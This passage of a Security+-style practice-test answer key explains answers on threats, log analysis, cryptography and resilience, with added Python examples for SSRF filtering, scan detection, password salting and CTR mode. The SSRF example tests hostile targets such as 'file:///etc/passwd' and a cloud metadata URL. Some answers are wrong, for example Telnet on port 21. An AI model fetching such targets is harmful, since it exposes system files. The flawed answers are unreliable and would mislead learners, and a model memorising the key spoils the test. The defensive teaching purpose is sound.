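    for candidate in ["https://api.example.com/v1/users", "http://127.0.0.1:8080/admin",
                      "http://[::1]/", "http://metadata.internal/latest/",
                      "http://mixed.example.com/", "file:///etc/passwd"]:
        ok, reason = ssrf_safe_target(candidate)
        print(f"{candidate:40} {'fetch' if ok else 'refuse'}: {reason}")
```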
186. B. Threat hunting can involve a variety of activities such as intelligence fusion, combining multiple data sources and threat feeds, and reviewing advisories and bulletins to remain aware of the threat environment for your organization or industry.
187. C. Passwords in memory are often stored in plain text for use. This means that attackers can recover them if they can access the memory where the password is stored, even if the storage is ephemeral.
188. D. The AIS service uses STIX and TAXII. STIX and TAXII are open standards that the Department of Homeland Security started the development of and uses for this type of effort. You can read more about AIS here: www.us-cert.gov/ais.
189. C. The reconnaissance phase of a penetration test involves gathering information about the target, including domain information, system information, and details about employees like phone numbers, names, and email addresses.
190. A. Angela has impersonated an actual employee of the delivery service to gain access to the company. Company uniforms are a very useful element for in-person social engineering. Whaling is a type of phishing attack aimed at leaders in an organization. A watering hole attack deploys malware or other attack tools at a site or sites that a target group frequently uses. Prepending is vaguely defined by the Security+ exam but can mean a number of things. When you see prepending on the exam, it should normally mean “adding something to the front of text.”
191. D. Acquisition via the gray market can lead to lack of vendor support, lack of warranty coverage, and the inability to validate where the devices came from. Nick should express concerns about the supply chain, and if his devices need to be from a trusted source or supplier with real support he may need to change his organization’s acquisition practices.
192. B. XML injection is often done by modifying HTTP queries sent to an XML-based web service. Reviewing web server logs to see what was sent and analyzing them for potential attacks will help Christina see if unexpected user input is visible in the logs. Syslog, authentication logs, and event logs are unlikely to contain information about web applications that would show evidence of an XML injection–based attack.
Use the following scenario for questions 193–195.
Frank is the primary IT staff member for a small company and has migrated his company’s infrastructure from an on-site data center to a cloud-based infrastructure as a service (IaaS) provider. Recently he has been receiving reports that his website is slow to respond and that it is inaccessible at times. Frank believes that attackers may be conducting a denial-of-service attack against his organization.
193. C. Frank’s best option is to review the anti-denial-of-service and other security tools that his cloud hosting provider provides, and to make appropriate use of them. The major infrastructure as a service (IaaS) providers have a variety of security tools that can help both detect and prevent DoS attacks from taking down sites that are hosted in their infrastructure. Calling the cloud service provider’s ISP will not work because the ISP works with the cloud provider, not with Frank! It is possible the cloud service provider might be able to assist Frank, but they are most likely to instruct him to use the existing tools that they already provide.
194. C. Since Frank is using the cloud service provider’s web services, he will need to review the logs that they capture. If he has not configured them, he will need to do so, and he will then need a service or capability to analyze them for the types of traffic he is concerned about. Syslog and Apache logs are both found on a traditional web host, and they would be appropriate if Frank was running his own web servers in the infrastructure as a service (IaaS) environment.
195. B. The most useful data is likely to come from an IPS, or intrusion prevention system. He will be able to determine if the attack is a denial-of-service (DoS) attack, and the IPS may be able to help him determine the source of the denial-of-service attack. A firewall might provide some useful information but would only show whether or not traffic was allowed and would not analyze the traffic for attack information. A vulnerability scanner would indicate if there was an issue with his application or the server, but it would not identify this type of attack. Antimalware software can help find malware on the system but isn’t effective against a DoS attack.
196. D. Contractual terms, auditing, and security reviews are all common means of reducing third-party risks when working with a vendor that is performing systems integration work. An SOC (service organization controls) report would typically be requested if you were going to use a third-party vendor’s data center or hosted services.
197. B. Training an artificial intelligence (AI) or machine learning (ML) system with tainted data is a significant concern. Elias needs to ensure that the traffic on his network is typical and nonmalicious to ensure that the AI does not presume that malicious traffic is normal for his network.
198. C. The most common motivation for hacktivists is to make a political statement. Reputational gains are often associated with script kiddies, whereas financial gain is most commonly a goal of organized crime or insider threats. Gathering high-value data is typical of both nation-state actors and organized crime.
199. D. Predictive analysis tools use large volumes of data, including information about security trends and threats, large security datasets from various security tools and other sources, and behavior patterns, to predict and identify malicious and suspicious behavior.
200. C. Identity fraud and identity theft commonly use Social Security numbers as part of the theft of identity. Tailgating involves following a person through a security door or gate so that you do not have to present credentials or a code, whereas impersonation is a social engineering technique where you claim to be someone else. Blackmail is a potential answer, but the most common usage is for identity fraud.
201. A. SOAR tools, like security information and event management (SIEM) tools, are highly focused on security operations. They include threat and vulnerability management, security incident response, and security operations and automation tools, but they do not provide source code analysis and testing tools.
202. B. The Security+ exam outline specifically lists these items as threat vectors. Although there are many others, you should be familiar with direct access, wireless, email, supply chain, social media, removable media, and cloud as vectors for the exam.
203. C. Although it may seem strange at first, both SourceForge and GitHub are used to house sample exploit code as well as other information that threat intelligence analysts may find useful. They are not part of the dark web, nor are they an automated indicator sharing (AIS) source or a public information sharing center.
204. B. Trusting rather than validating user input is the root cause of improper input handling. All input should be considered potentially malicious and thus treated as untrusted. Appropriate filtering, validation, and testing should be performed to ensure that only valid data input is accepted and processed.
205. C. The code is an example of a PowerShell script that downloads a file into memory. You can rule out the upload options by reading the script since it mentions a download in the script example. Since we see a string being downloaded, rather than a file and location, you may be able to guess that this is a fileless malware example.
206. C. Session IDs should be unique for distinct users and systems. A very basic type of session replay attack involves providing a victim with a session ID and then using that session ID once they have used the link and authenticated themselves. Protections such as session timeouts and encrypting session data, as well as encoding the source IP, hostname, or other identifying information in the session key, can all help prevent session replay attacks.
207. B. The Security+ exam outline lists seven major impact categories, including data loss, data breaches, and data exfiltration. Data modification is not listed, but it is a concern as part of the integrity leg of the CIA triad.
208. C. Academic journals are the slowest of the items listed because of the review processes involved with most reputable journals. Although academic journals can be useful resources, they are typically not up-to-the-minute sources. Other resources you should be aware of are vendor websites, conferences, social media, and RFCs (requests for comments).
209. C. Vulnerability scans and port scans can often be detected in logs by looking for a series of ports being connected to. In this case, the log was created by scanning a system with an OpenVAS scanner. There is no indication of a successful login or other hacking attempt, and a service startup would show in the messages log, not the auth log. A reboot would also show in the messages log rather than the auth log.
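How the pattern described above looks in an auth log and how to pick it out, as an added example that is not from the book. The sshd log lines, the 60-second window and the threshold of eight connections are constructed for the example; a scanner probing the SSH port leaves many connections that close before authentication, while a real user leaves one accepted login.

```python
"""Added example (not from the book): flagging scanner-style connection churn
in an auth log, the kind of evidence the answer above says a port or
vulnerability scan leaves behind.

SAMPLE_AUTH_LOG is constructed for this example in the syslog/sshd format;
the window and threshold are example settings, not the book's.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample auth.log lines (not real data): one normal login, a burst
# of connections from 10.0.2.15 that never present an SSH banner or finish
# authenticating, and one stray dropped connection from another host.
SAMPLE_AUTH_LOG = """\
Mar 19 10:15:01 web01 sshd[2311]: Accepted publickey for deploy from 192.0.2.40 port 50212 ssh2: ED25519 SHA256:abc
Mar 19 10:16:03 web01 sshd[2350]: Did not receive identification string from 10.0.2.15 port 41234
Mar 19 10:16:03 web01 sshd[2351]: Connection closed by 10.0.2.15 port 41235 [preauth]
Mar 19 10:16:04 web01 sshd[2352]: Connection closed by 10.0.2.15 port 41236 [preauth]
Mar 19 10:16:04 web01 sshd[2353]: Did not receive identification string from 10.0.2.15 port 41237
Mar 19 10:16:05 web01 sshd[2354]: Connection closed by 10.0.2.15 port 41238 [preauth]
Mar 19 10:16:05 web01 sshd[2355]: Connection closed by 10.0.2.15 port 41239 [preauth]
Mar 19 10:16:06 web01 sshd[2356]: Did not receive identification string from 10.0.2.15 port 41240
Mar 19 10:16:06 web01 sshd[2357]: Connection closed by 10.0.2.15 port 41241 [preauth]
Mar 19 10:16:07 web01 sshd[2358]: Connection closed by 10.0.2.15 port 41242 [preauth]
Mar 19 10:16:07 web01 sshd[2359]: Did not receive identification string from 10.0.2.15 port 41243
Mar 19 10:30:00 web01 sshd[2402]: Connection closed by 192.0.2.41 port 50300 [preauth]
"""

# Lines for a connection that never got past the protocol handshake.
PREAUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?:Did not receive identification string from|Connection closed by) "
    r"(?P<src>[0-9a-fA-F.:]+) port (?P<port>\d+)(?: \[preauth\])?$"
)


def parse_preauth_events(log_text: str) -> List[Tuple[datetime, str]]:
    """Return (timestamp, source_ip) for each pre-authentication close/abort line.
    Syslog timestamps carry no year, so strptime leaves it at its default."""
    events = []
    for line in log_text.splitlines():
        m = PREAUTH_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            events.append((ts, m.group("src")))
    return events


def find_scanners(log_text: str, threshold: int = 8, window_seconds: int = 60) -> Dict[str, int]:
    """Flag sources with at least `threshold` pre-auth events inside any sliding window.

    Returns {source_ip: peak_events_in_window} for each flagged source. A single
    dropped connection from a legitimate host never reaches the threshold.
    """
    per_source = defaultdict(deque)   # source -> timestamps inside the current window
    peaks: Dict[str, int] = defaultdict(int)
    for ts, src in sorted(parse_preauth_events(log_text)):
        q = per_source[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        peaks[src] = max(peaks[src], len(q))
    return {src: n for src, n in peaks.items() if n >= threshold}


if __name__ == "__main__":
    window = 60
    for src, n in find_scanners(SAMPLE_AUTH_LOG, window_seconds=window).items():
        print(f"{src}: {n} pre-auth connections inside {window}s, consistent with a scan")
```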
210. C. Although it may be tempting to immediately upgrade, reading and understanding the CVEs for a vulnerability is a good best practice. Once Charles understands the issue, he can then remediate it based on the recommendations for that specific problem. Disabling PHP or the web server would break the service, and in this case, only newer versions of PHP than 5.4 have the patch Charles needs.
211. D. Although 80 and 443 are the most common HTTP ports, it is common practice to run additional web servers on port 8080 when a nonstandard port is needed. SSH would be expected to be on port 22, RDP on 3389, and MySQL on 3306.
212. B. Once this issue is remediated, Rick should investigate why the system was running a plug-in from 2007. In many cases, when you discover a vulnerable component like this it indicates a deeper issue that exists in the organization or processes for system and application maintenance. Installing a web application firewall (WAF) or reviewing intrusion prevention system (IPS) logs may be useful if Rick thinks there are ongoing attacks or that successful attacks have occurred, but the problem does not state anything about that. There is no indication of compromise, merely a completely outdated plug-in version in the problem. If you want a sample system with vulnerable plug-ins like this to test, you can download the 2015 release of the Open Web Application Security Project (OWASP) broken web applications virtual machine. It has a wide range of completely out-of-date applications and services to practice against.
213. C. A network device running SSH and a web server on TCP port 443 is a very typical discovery when running a vulnerability scan. Without any demonstrated issues, Carolyn should simply note that she saw those services. Telnet runs on port 21, an unencrypted web server will run on TCP 80 in most cases, and Windows file shares use a variety of ports including TCP ports 135–139 and 445.
214. B. Configuration reviews, either using automated tools or manual validation, can be a useful proactive way to ensure that unnecessary ports and services are not accessible. Configuration management tools can also help ensure that expected configurations are in place. Neither passive nor active network packet capture will show services that are not accessed, meaning that open ports could be missed, and log review won’t show all open ports either.
215. C. Errors are considered a vulnerability because they often provide additional details about the system or its configuration. They typically cannot be used to directly exploit or crash the system.
216. D. This appears to be a situation where your network’s DNS server is compromised and sending people to a fake site. A Trojan horse is malware tied to a legitimate program. IP spoofing would be using a fake IP address, but that is not described in this scenario. In fact, the users are not even typing in IP addresses—they are typing in URLs. Clickjacking involves tricking users into clicking something other than what they intended.
217. C. This is a classic example of typosquatting. The website is off by only one or two letters; the attacker hopes that users of the real website mistype the URL and are taken to their fake website. Session hijacking is taking over an authenticated session. Cross-site request forgery sends fake requests to a website that purport to be from a trusted, authenticated user. Clickjacking attempts to trick users into clicking on something other than what they intended.
Chapter 2: Architecture and Design
1. C. The diagram shows services and ports, but it does not list the protocol. Ben should ask if these are TCP- or UDP-based services, since an incorrect guess would result in a nonfunctional service, and opening up unnecessary protocols may inadvertently create exposures or risks. The subnet mask is shown where multiple systems in a network on the client side require it, the service name isn’t necessary for a firewall rule, and API keys should not be stored in documents like this.
2. A. The correct answer is the Open Web Application Security Project (OWASP). It is the de facto standard for web application security. The North American Electric Reliability Corporation (NERC) is concerned with electrical power plant security, Trusted Foundry is a term used to describe a secure supply chain for computer ICs, and ISA/IEC standards are for securing industrial automation and control systems (IACSs).
3. B. Vendor diversity gives two security benefits. The first is that there is no single point of failure should one vendor cease operations. The second benefit is that each vendor has a specific methodology and algorithms used for detecting malware. If you use the same vendor at all points where you need malware detection, any flaw or weakness in that vendor’s methodology will persist across the network. Using a single vendor means that any weakness in that vendor’s methodology or technology could impact the entire system or network. Vendor forking is not a term in the industry, and this is not a neutral act; vendor diversity improves security.
4. B. In this scenario, the best fit to Scott’s needs is a second network attached storage (NAS) device with a full copy of the primary NAS. In a failure scenario, the secondary NAS can simply take the place of the primary NAS while individual disks or even the whole NAS is replaced. Tape-based backups take longer to restore, regardless of whether they are full or incremental backups, although incremental backups can take more time in some cases since swapping tapes in order can add time to the restoration process. Finally, a cloud-based backup system would be useful if Scott was worried about a local disaster but would be slower than a local identical NAS, thus not meeting Scott’s primary requirement.
5. C. Restoration order can be very important in a complex environment due to system dependencies. Restoration order can also ensure that the proper security controls are in place before systems are online. A data center should be able to handle systems coming online without failing if its power systems are properly designed. A second outage due to failed systems would mean that Yasmine has not determined why the outage has occurred, making restoration potentially dangerous or problematic. Finally, fire suppression systems should only activate for an actual fire or when fire precursors like smoke are detected, not for increased heat load.
6. B. Air gapping refers to the server not being on a network. This means literally that there is “air” between the server and the network. This prevents malware from infecting the backup server. A separate VLAN or physical network segment can enhance security but is not as effective as air gapping. A honeynet is used to detect attacks against a network, but it doesn’t provide effective defense against malware in this scenario.
7. C. Windows picture passwords require you to click on specific locations on a picture. This is an example of a something-you-can-do factor. Geolocation or a network location are examples of somewhere you are, whereas something you exhibit is often a personality trait, and someone you know is exactly what it sounds like: someone who can identify you as an individual.
8. C. Hash functions convert variable-length inputs into fixed-length outputs while minimizing the chances of multiple inputs resulting in the same output (collisions). They also need to be fast to compute. Hashes should not be reversible; they are a one-way function!
9. B. The most common way to ensure that third-party secure destruction companies perform their tasks properly is to sign a contract with appropriate language and make sure that they certify the destruction of the materials they are asked to destroy. Manual on-site inspection by third parties is sometimes done as part of certification, but federal certification is not a common process. Requiring pictures of every destroyed document would create a new copy, thus making it a flawed process.
10. A. Using both server-side execution and validation requires more resources but prevents client-side tampering with the application and data. For Olivia’s described needs, server-side execution and validation is the best option.
11. D. An Arduino is a microcontroller well suited for custom development of embedded systems. They are small, inexpensive, and commonly available. Unlike a Raspberry Pi, they are not a small computer, reducing their overall risk of compromise. A custom field-programmable gate array (FPGA) will typically be more complex and expensive than an Arduino, whereas a repurposed desktop PC introduces all the potential issues that a PC can include such as a vulnerable operating system or software.
12. D. Digital signatures are created using the signer’s private key, allowing it to be validated using their public key.
13. C. Adding one bit to a key doubles the work required. The original effort would have 2^128 potential solutions, whereas the increased key length would require 2^129. In real life, key lengths aren’t increased by 1; instead, they are typically increased by factors of 2, such as 128 to 265, or 1024 to 2048.
14. C. Key stretching is used to improve weak keys. One way of implementing it is by repeatedly using a hash function or a block cipher, increasing the effort that an attacker would need to exert to attack the resulting hashed or encrypted data. The rest of the options were made up.
15. A. A salt is a value added to a string before it is hashed. The salt is stored so that it can be added to passwords when they are used in the future to compare to the hash. Since each salt is unique, this means that an attacker would need to generate a unique rainbow table for every salt to be able to attack the stored hashes effectively. For high-value passwords, this may be worthwhile, but for bulk lists of passwords, it is not a reasonable attack method.
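Answers 14 and 15 together, as an added example that is not from the book: a per-user salt stored next to a stretched hash, using PBKDF2-HMAC-SHA256 from the Python standard library as the stretching step. The iteration count and the record format are choices made for this example.

```python
"""Added example (not from the book): per-user salts plus key stretching for
stored password verifiers, combining answers 14 and 15 above.

Stretching here is PBKDF2-HMAC-SHA256 (one way of "repeatedly using a hash
function"); the iteration count and the stored-record layout are example
choices, not the book's.
"""
import base64
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 600_000   # example setting; raise it as hardware gets faster
SALT_BYTES = 16


def derive(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """Stretch `password` with `salt`: each round feeds the previous HMAC output
    back in, so testing one guess costs an attacker the same work it costs us."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)


def make_verifier(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: algorithm$iterations$salt$hash.

    Nothing in the record is secret: the salt is stored beside the hash, exactly
    as answer 15 describes, so the same salt can be applied at the next login.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)   # unique per user; a shared salt defeats the purpose
    digest = derive(password, salt)
    return "pbkdf2-sha256${}${}${}".format(
        ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify(password: str, record: str) -> bool:
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_b64, hash_b64 = record.split("$")
    if algo != "pbkdf2-sha256":
        raise ValueError("unknown verifier format")
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(hash_b64)
    return hmac.compare_digest(derive(password, salt, int(iterations)), expected)


def same_password_distinct_records(password: str) -> bool:
    """Two users with the same password get different verifiers because their
    salts differ; a table precomputed for one salt is useless against another."""
    return make_verifier(password) != make_verifier(password)


if __name__ == "__main__":
    record = make_verifier("correct horse battery staple")
    print(record)
    print("right password:", verify("correct horse battery staple", record))
    print("wrong password:", verify("Correct horse battery staple", record))
    print("same password, distinct records:", same_password_distinct_records("hunter2"))
```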
16. C. Ian will use Michelle’s public key to encrypt the message so that only she can read it using her private key. If he wanted to sign the message, he could use his private key, and Michelle could use his public key to validate his signature. Neither Ian nor Michelle should ever reveal their private keys.
17. A. Elliptical curve cryptography (ECC) is faster because it can use a smaller key length to achieve levels of security similar to a longer RSA key (a 228-bit elliptical curve key is roughly equivalent to a 2,380-bit RSA key). Using the same key to encrypt and decrypt would be true for a symmetric encryption cryptosystem; however, neither of these are symmetric. Either algorithm can run on older processors given the right cryptographic libraries or programming, although both will be slower. Both can be used for digital signatures.
18. A. Perfect forward secrecy (PFS) is used to change keys used to encrypt and decrypt data, ensuring that even if a compromise occurs, only a very small amount of data will be exposed. Symmetric encryption uses a single key. Quantum key rotation and Diffie-Hellman key modulation are both terms made up for this question.
19. A. Checking a visitor’s ID against their logbook entry can ensure that the information they have recorded is correct and that the person’s ID matches who they claim to be. Biometric scans only work on enrolled individuals, meaning that many guests may not have biometric data enrolled. Two-person integrity control would only be useful if there was a concern that a guard was allowing unauthorized individuals into the facility. A security robot typically cannot validate a visitor’s identity from an ID and log entry. This may change as they become more advanced!
20. D. Honeypots are designed to attract a hacker by appearing to be security holes that are ripe and ready for exploitation. A honeynet is a network honeypot. This security technique is used to observe hackers in action while not exposing vital network resources. An intrusion detection system (IDS) is used to detect activity that could indicate an intrusion or attack. Neither active detection nor false subnet is a common industry term.
21. C. SCADA, or Supervisory Control and Data Acquisition systems, are commonly used to manage facilities like power plants. The rest of the options were made up.
22. D. Prime factorization algorithms and elliptic curve cryptography are believed to be vulnerable to future quantum computing–driven attacks against cryptographic systems. Although this is largely theoretical at the moment, quantum encryption may be the only reasonable response to quantum attacks against current cryptographic algorithms and systems.
23. C. Geoff is looking for a warm site, which has some or all of the infrastructure and systems he needs but does not have data. If a disaster occurs, Geoff can bring any equipment that he needs or wants to the site along with his organization’s data to resume operations. A hot site is a fully functional environment with all the hardware, software, and data needed to operate an organization. They are expensive to maintain and run but are used by organizations that cannot take the risk of downtime. A cold site is a location that can be brought online but does not have systems; cold sites typically have access to power and bandwidth but need to be fully equipped to operate after a disaster since they are just rented space. An RTO is a recovery time objective, and it measures how long it should take to resume operations; it is not a type of disaster recovery site.
24. B. If Olivia wants to ensure that third parties will be unable to modify the operating system for Internet of Things (IoT) devices, requiring signed and encrypted firmware for operating system updates is an effective means of stopping all but the most advanced threats. Setting a default password means that a common password will be known. Checking the MD5 sum for new firmware versions will help administrators validate that the firmware is legitimate, but signed and encrypted firmware is a much stronger control. Finally, regular patching may help secure the devices but won't prevent OS modifications.
25. B. After quantum encryption and decryption technologies become mainstream, it is generally believed that nonquantum cryptosystems will be defeated with relative ease, meaning that quantum cryptography will be required to be secure. Qubits are quantum bits, not a measure of speed; quantum encryption will be the relevant solution in a post-quantum encryption world; and even very long RSA keys are expected to be vulnerable.
26. B. Counter mode (CTR) makes a block cipher into a stream cipher by generating a keystream block using a nonrepeating sequence to fill in the blocks. This allows data to be streamed instead of waiting for blocks to be ready to send. It does not perform the reverse, turning a stream cipher into a block cipher, nor does it reverse the encryption process (decryption). Public keys cannot unlock private keys; they are both part of an asymmetric encryption process.
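The counter-mode construction described in answer 26, as an added example that is not part of the book: a keyed hash stands in for the block cipher (an assumption made so the code runs with only the standard library), and the mode is shown encrypting in chunks and decrypting with the same operation, plus the failure mode that follows when the counter sequence repeats.

```python
import hashlib
import hmac

BLOCK_SIZE = 16  # bytes produced per counter block, as with a 128-bit block cipher


def prf_block(key: bytes, nonce: bytes, counter: int) -> bytes:
    """Encrypt one counter block.

    Real CTR mode runs the block cipher (e.g., AES) over nonce||counter.
    This constructed stand-in uses a keyed hash so the example needs only
    the standard library; the mode built on top of it is unchanged.
    """
    counter_block = nonce + counter.to_bytes(8, "big")  # 8-byte nonce + 8-byte counter
    return hmac.new(key, counter_block, hashlib.sha256).digest()[:BLOCK_SIZE]


def ctr_keystream(key: bytes, nonce: bytes, length: int, offset: int = 0) -> bytes:
    """Keystream bytes [offset, offset + length).

    Each block is prf_block(counter); the counter increments and never
    repeats under one nonce, which is the nonrepeating sequence CTR needs.
    """
    counter = offset // BLOCK_SIZE  # first block that covers the offset
    skip = offset % BLOCK_SIZE      # bytes of that block already consumed
    out = bytearray()
    while len(out) < skip + length:
        out += prf_block(key, nonce, counter)
        counter += 1
    return bytes(out[skip:skip + length])


def ctr_crypt(key: bytes, nonce: bytes, data: bytes, offset: int = 0) -> bytes:
    """Encrypt or decrypt (the same operation): data XOR keystream.

    Any length works, so data can be processed as it arrives instead of
    waiting for a full block; offset lets a later chunk continue the stream.
    """
    keystream = ctr_keystream(key, nonce, len(data), offset)
    return bytes(d ^ k for d, k in zip(data, keystream))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(key: bytes, nonce: bytes, pt1: bytes, pt2: bytes) -> bool:
    """Encrypt two messages under the same key and nonce and report whether
    XOR of the ciphertexts equals XOR of the plaintexts.

    It does: both messages received the same keystream, so the keystream
    cancels out. This is why the counter sequence must never repeat for a
    given key, and why a repeated nonce in logs or captures is a finding.
    """
    ct1 = ctr_crypt(key, nonce, pt1)
    ct2 = ctr_crypt(key, nonce, pt2)
    return xor_bytes(ct1, ct2) == xor_bytes(pt1, pt2)


if __name__ == "__main__":
    # Constructed key and nonce for demonstration only.
    key = b"\x01" * 32
    nonce = b"\x00" * 8
    message = b"streamed over the wire in chunks, not blocks"
    whole = ctr_crypt(key, nonce, message)
    chunked = ctr_crypt(key, nonce, message[:7]) + ctr_crypt(key, nonce, message[7:], offset=7)
    print("chunked == whole:", chunked == whole)
    print("decrypts back:", ctr_crypt(key, nonce, whole) == message)
    print("nonce reuse leaks plaintext XOR:", keystream_reuse_leak(key, nonce, b"hello world", b"other words"))
```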
27. D. Blockchain public ledgers contain an identity for participants (although the identity may be semi-anonymous), the transaction record, and the balance or other data that the blockchain is used to store. Since there is no central authority, there is no token to identify authorities.
28. C. A test server should be identical to the production server. This can be used for functional testing as well as security testing, before deploying the application. The production server is the live server. A development server would be one the programmers use during development of a web application, and predeployment server is not a term typically used in the industry.
29. C. Staging environments, sometimes called preproduction environments, are typically used for final quality assurance (QA) and validation before code enters the production environment as part of a deployment pipeline. Staging environments closely mirror production, allowing realistic testing and validation to be done. Development and test environments are used to create the code and for testing while it is being developed.
30. C. Application programming interface (API) keys are frequently used to meet this need. An API key can be issued to an individual or organization, and then use of the API can be tracked to each API key. If the API key is compromised or abused, it can be revoked and a new API key can be issued. Firewall rules written to use public IP addresses can be fragile, since IP addresses may change or organizations may have a broad range of addresses that may be in use, making it hard to validate which systems or users are using the API. Credentials, including passwords, are not as frequently used as API keys.
31. D. Embedded systems like smart meters typically do not include a SQL server to attack, making SQL injection an unlikely issue. Derek should focus on securing the traffic from his meter, ensuring that denial-of-service (DoS) attacks are difficult to accomplish and that remotely disconnecting the meter using exposed administrative interfaces or other methods is prevented.
32. A. Honeypots are systems configured to appear to be vulnerable. Once an attacker accesses them, they capture data and tools while causing the attacker to think that they are successfully gaining control of the system. This allows defenders like Selah to study and analyze their techniques and tools without endangering their production systems. An intrusion detection system (IDS) or intrusion protection system (IPS) can detect and stop attacks, and may even capture some tools, but they are not designed to capture local commands and downloaded tools. A WAF is a web application firewall and is intended to stop attacks on web applications.
33. D. Honeynets are intentionally vulnerable networks set up to allow for capture and analysis of attacker techniques and tools. A black hole is a term commonly used for a system or network device where traffic is discarded, and black hole routing involves sending traffic to a null route that goes nowhere.
34. B. Maria should implement ongoing auditing of the account usage on the SCADA system. This will provide a warning that someone's account is being used when they are not actually using it. Host-based antivirus is almost never a bad idea, but this scenario did not indicate that the compromise was due to malware, so antimalware may not address the threat. Since the engineer has access to the SCADA system, a network intrusion prevention system (NIPS) is unlikely to block them from accessing the system, and full-disk encryption (FDE) will not mitigate this threat because the system is live and running, meaning that the disk will be decrypted in use.
35. B. Both Advanced Encryption Standard (AES) and Data Encryption Standard (DES) are block ciphers. That means that they encrypt groups (blocks) of plain-text symbols together as a single block. If you know that either AES or DES is a block cipher, you can eliminate half of the options here. If you know that a block cipher works on groups of symbols or blocks of text, you can also eliminate half the options as incorrect.
36. A. A hardware security module (HSM) is the most secure way to store private keys for the e-commerce server. An HSM is a physical device that safeguards and manages digital keys. Full-disk encryption (FDE) will protect the data on the e-commerce server, but it won't help store the key. It is also difficult to fully encrypt the e-commerce server drive, since the drive will need to be in use for the e-commerce to function. A self-encrypting drive (SED) is merely automatic full-disk encryption. Software-defined networking (SDN) won't address the issues in this scenario, since it configures networks via software and does not provide secure key storage.
37. B. Transit gateways are a transit hub used to connect VPCs (virtual private clouds) to on-premises networks. You can read more about transit gateways at docs.aws.amazon.com/vpc/latest/tgw/what-is-transit-gateway.html. IBM uses the same term, but for a very specific internal cloud connection.
38. C. You should implement a staging server so that code can be deployed to an intermediate staging environment. This will allow testing of security features, as well as checking to see that the code integrates with the entire system. Using third-party libraries and software development kits (SDKs) can help reduce errors and vulnerabilities in the code. Sandboxing is used to isolate a particular environment, and virtualization will not mitigate this risk. Even if the production server is virtualized, the risks are the same. Finally, deployment policies are a good idea, but they are not the most effective way to mitigate this particular risk.
39. C. Ian should be concerned that attackers might be able to redirect short message service (SMS) messages sent to VoIP phones. This potential issue is one reason that some multifactor deployments do not allow SMS messages to be sent to VoIP phones in the environment, and some organizations do not allow SMS as an option, instead requiring hardware tokens or application-based multifactor authentication. Vishing is a type of phishing done via voice, voicemail hijacking would redirect voicemail to another mailbox by forwarding calls, and weak multifactor code injection was made up for this question.
40. A. Baseline configurations, per NIST 800-53: "Baseline configurations serve as a basis for future builds, releases, and/or changes to information systems. Baseline configurations include information about information system components (e.g., standard software packages installed on workstations, notebook computers, servers, network components, or mobile devices; current version numbers and patch information on operating systems and applications; and configuration settings/parameters), network topology, and the logical placement of those components within the system architecture. Maintaining baseline configurations requires creating new baselines as organizational information systems change over time. Baseline configurations of information systems reflect the current enterprise architecture."
41. B. HVAC systems are an important part of the availability for systems and infrastructure. They are also a target for attackers who target Internet of Things (IoT) or network-connected devices. They are not frequent targets for use in social engineering efforts, although they could be used that way. They are not a primary line of defense for organizations.
42. B. Symmetric encryption is typically faster than asymmetric encryption. This is why many protocols use asymmetric encryption to exchange a symmetric key, and then use that key for the rest of their transaction. It is not more secure, key length is not a meaningful difference between symmetric and asymmetric encryption, and key distribution for symmetric encryption is more challenging for larger populations using symmetric encryption if confidentiality needs to be maintained because every potential pair of communicators would need a different symmetric key.
43. C. Entropy is a measure of uncertainty. Having sources of entropy (or randomness) is a key element in a PRNG. Some pseudo-random number generators rely on input from keyboards, mice, or other human-generated inputs to have a source of entropy data.
44. A. With the software as a service (SaaS) model, the consumer has the ability to use applications provided by the cloud provider over the Internet. SaaS is a subscription service where software is licensed on a subscription basis. Platform as a service (PaaS) provides the framework and underlying tools to build applications and services. Infrastructure as a service (IaaS) provides the components of an entire network and systems infrastructure. Hybrid models use both cloud and locally hosted systems.
45. C. Resource policies are associated with a resource and allow you to determine which principals have access to that resource as well as what actions they can take on it. Resource policies are not used to set consumption limits.
46. D. Storage area network (SAN) replication copies the contents of one repository to another repository, such as an organization's central SAN environment to a remote SAN, at the hardware or block level.
47. C. A snapshot is an image of the virtual machine (VM) at some point in time. It is standard practice to periodically take a snapshot of a virtual system so that you can return that system to a last known good state. Sandboxing is the process of isolating a system or software. The hypervisor is the mechanism through which the virtual environment interacts with the hardware, and elasticity is the ability for the system to scale.
48. D. RAID level 5 is disk striping with distributed parity. It can withstand the loss of any single disk. RAID 0 is disk striping; it does not provide any fault tolerance. RAID 1 is mirroring. It does protect against the loss of a single disk but not with distributed parity. RAID 3 is disk striping with dedicated parity. This means a dedicated drive containing all the parity bits.
49. D. A Faraday cage, named after physicist Michael Faraday, involves placing wire mesh around an area or device to block electromagnetic signals. A VLAN can segment a network but won't block electromagnetic interference (EMI). Software-defined networking (SDN) virtualizes a network but does not protect against EMI. A Trusted Platform Module (TPM) is used for cryptographic applications.
50. B. The correct answer is bollards. These are large objects, often made of concrete or similar material, designed specifically to prevent a vehicle getting past them. Most gates can be breached with a vehicle. A security guard is a good idea, but they would not be able to stop a vehicle from ramming the building. Security cameras will provide evidence of a crime that was committed but won't prevent the crime.
51. A. Attaching cable locks to the computers and locking them to the table will make it more difficult for someone to steal a computer. Full-disk encryption (FDE) won't stop someone from stealing the computer, nor will strong passwords. A sign-in sheet is a good idea and may deter some thefts, but it is not the best approach to stopping theft offered in this scenario.
